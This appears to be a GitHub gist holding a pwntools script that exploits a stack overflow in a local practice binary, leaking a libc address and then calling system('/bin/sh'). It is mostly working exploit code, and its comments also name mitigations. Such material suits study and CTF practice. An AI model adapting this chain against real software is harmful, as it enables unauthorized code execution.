@n4sm
Created September 20, 2020 16:03
#!/usr/bin/python2
from pwn import *
def padd(d):
    """Right-pad *d* with NUL bytes to a width of 8 so it can be unpacked as a u64.

    Input that is already 8 characters or longer is returned unchanged, so a
    leaked line longer than a pointer is not truncated here (the caller's
    unpack will then fail on the length, which is the intended signal).
    """
    return d.ljust(8, '\x00')
# Two-stage ret2libc chain against a 64-bit binary.  Stage 1 overflows the
# stack buffer, leaks a libc pointer by calling puts on a GOT entry, then
# returns to main; stage 2 reuses the same overflow to call system("/bin/sh")
# with addresses rebased on the leak.  Every gadget, PLT and GOT address below
# is hard-coded, so the target is presumably built without PIE - confirm with
# checksec before adjusting the offsets.
#
# NOTE(review): from the defender's side the root cause is an unbounded read
# into a fixed-size stack buffer (the leak is resolved against libc's gets, so
# the binary presumably reads input with gets).  A bounded read removes the
# bug; a stack canary would stop the overflow from reaching the return
# address, and PIE would invalidate the fixed addresses used in both stages.
p = process("/home/nasm/rop")
# TO EDIT
# The binary: https://mega.nz/file/KTAFgCgQ#kaixyg495AlHonWvsza0KVkkdQpgVMIotrV86wwbpz8
e = ELF('/home/nasm/rop')
# Must be the exact libc the target loads: the offsets of gets, system and
# the "/bin/sh" string are read from this file.
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
# TO EDIT (run `ldd rop` to discover which libc the binary is linked against)
# 0x28 bytes fill the buffer and saved rbp up to the saved return address.
padding = "A"*0x28
pld = padding
pld += p64(0x00400683) # pop rdi
pld += p64(0x601020) # got entry get
pld += p64(0x4004a0) # puts@plt
pld += p64(e.symbols['main']) # main
# gdb.attach(p.pid)
p.recvuntil("Hello\n")
p.sendline(pld)
# puts stops at the first NUL of the 8-byte pointer, so the printed line is
# usually shorter than 8 bytes; padd restores the width for u64.  A line
# longer than 8 bytes makes u64 raise, which means the leak read the wrong
# line - assumes the pointer is the first line after the prompt, TODO confirm.
leak = u64(padd(p.recvline().replace("\n", "")))
log.info("leak: {}".format(hex(leak)))
# The leaked GOT entry is treated as gets, hence the rebasing on gets' offset.
base_libc = leak - libc.symbols['gets']
log.info("libc: {}".format(hex(base_libc)))
system = base_libc + libc.sym.system
log.info("system: {}".format(hex(system)))
binsh = base_libc + next(libc.search("/bin/sh\00"))
log.info("binsh: {}".format(hex(binsh)))
# Stage 2: same overflow, now that main has been re-entered.
pld = padding
# The extra ret presumably re-aligns rsp to 16 bytes before entering system;
# drop it if the call faults the other way - confirm in gdb.
pld += p64(0x00400684) # ret
pld += p64(0x00400683) # pop rdi
pld += p64(binsh)
pld += p64(system)
p.sendafter("Hello\n", pld + '\n')
#gdb.attach(p.pid)
p.interactive()